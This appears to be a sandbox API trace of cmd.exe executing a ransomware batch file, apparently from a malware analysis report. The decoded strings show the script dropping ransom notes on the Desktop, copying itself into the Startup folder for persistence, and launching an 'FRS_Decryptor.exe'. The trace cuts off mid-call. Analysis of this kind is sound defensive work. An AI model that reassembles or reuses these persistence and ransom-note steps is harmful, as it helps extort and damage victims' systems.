MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0096.755] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.755] GetFileType (hFile=0x260) returned 0x1 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0096.755] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0096.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0096.756] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.756] GetFileType (hFile=0x260) returned 0x1 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0096.756] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0096.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0096.756] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.756] GetFileType (hFile=0x260) returned 0x1 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0096.756] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0096.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0096.756] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.756] GetFileType (hFile=0x260) returned 0x1 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0096.756] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0096.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0096.756] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.756] GetFileType (hFile=0x260) returned 0x1 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0096.756] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0096.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0096.757] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.757] GetFileType (hFile=0x260) returned 0x1 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0096.757] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0096.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0096.757] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.757] GetFileType (hFile=0x260) returned 0x1 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0096.757] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0096.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0096.757] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.757] GetFileType (hFile=0x260) returned 0x1 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0096.757] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0096.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0096.757] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.757] GetFileType (hFile=0x260) returned 0x1 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0096.757] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0096.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0096.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0096.758] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.758] GetFileType (hFile=0x260) returned 0x1 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0096.758] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0096.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0096.758] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.758] GetFileType (hFile=0x260) returned 0x1 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0096.758] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0096.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0096.758] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.758] GetFileType (hFile=0x260) returned 0x1 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0096.758] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0096.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0096.758] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.758] GetFileType (hFile=0x260) returned 0x1 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0096.758] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0096.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0096.758] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.758] GetFileType (hFile=0x260) returned 0x1 [0096.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0096.759] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0096.759] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0096.759] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.759] GetFileType (hFile=0x260) returned 0x1 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0096.759] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0096.759] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0096.759] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.759] GetFileType (hFile=0x260) returned 0x1 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0096.759] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0096.759] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0096.759] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.759] GetFileType (hFile=0x260) returned 0x1 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0096.759] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0096.759] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0096.759] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.759] GetFileType (hFile=0x260) returned 0x1 [0096.759] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0096.759] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0096.760] SetFilePointer (in: hFile=0x260, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0096.760] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0096.760] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0096.760] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.760] GetFileType (hFile=0x260) returned 0x1 [0096.760] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0096.760] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0096.760] SetFilePointer (in: hFile=0x260, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0096.760] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0096.760] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0096.760] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.760] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0096.760] _get_osfhandle (_FileHandle=0) returned 0x24 [0096.760] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0096.760] SetConsoleInputExeNameW () returned 0x1 [0096.760] GetConsoleOutputCP () returned 0x1b5 [0096.760] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0096.760] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.761] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0096.761] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0096.761] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.761] SetFilePointer (in: hFile=0x260, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0096.761] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0096.761] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0096.761] SetFilePointer (in: hFile=0x260, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0096.761] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0096.761] GetFileType (hFile=0x260) returned 0x1 [0096.761] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.761] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0096.761] _tell (_FileHandle=3) returned 2512 [0096.761] _close (_FileHandle=3) returned 0 [0096.761] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0096.761] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0096.761] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0096.761] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0096.761] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0096.761] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0096.761] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0096.761] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0096.761] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0096.761] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0096.761] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0096.761] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0096.761] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0096.761] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0096.762] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0096.762] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0096.762] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0096.762] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0096.762] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0096.762] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0096.762] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0096.762] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0096.762] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0096.762] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0096.762] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0096.762] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0096.762] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0096.762] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0096.762] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0096.762] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0096.762] _wcsicmp (_String1="ping", 